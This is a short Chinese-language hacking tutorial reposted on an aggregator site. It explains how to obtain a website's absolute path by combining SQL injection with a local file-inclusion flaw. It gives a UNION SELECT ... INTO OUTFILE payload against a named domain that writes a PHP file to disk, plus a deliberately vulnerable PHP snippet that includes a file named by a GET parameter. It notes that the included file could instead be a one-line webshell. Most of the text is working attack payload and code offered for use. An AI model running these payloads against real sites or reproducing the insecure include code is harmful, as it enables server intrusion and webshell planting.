日期:2010-03-30 00:00:00 来源:本站整理
绝对办法获得web途径[网络技术]
本文“绝对办法获得web途径[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
感激孤水朋友的一文章,首先假定我们的网站存在SQL注入漏洞与一个本地包含漏洞!
那么PHP.INI里的magic_quotes_gpc = off
我们重注射点判断出为ROOT权限!
www.lengyueduyun.com/index.php?id=2 union select 1,2,3,4,这里写<? phpinfo(); ?> 十六进制转换,5,6 into outfile 'D:\\duyun\\1.php';
这样1.php 内容就是<? phpinfo(); ?>咯!下面是包含漏洞的代码!保存为index.php~大家不用随着我做~我只是假定罢了
<?php
$fuck = $_GET["fuck"];
if ($fuck) {
include $_GET["fuck"];
}
?>
下面浏览器输入www.lengyueduyun.com/index.php?fuck=D:\duyun\1.php
这样就可以查看到WEB绝度途径咯
增补一点,包含的文件可以是一句话木马等等..
以上是“绝对办法获得web途径[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |
评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论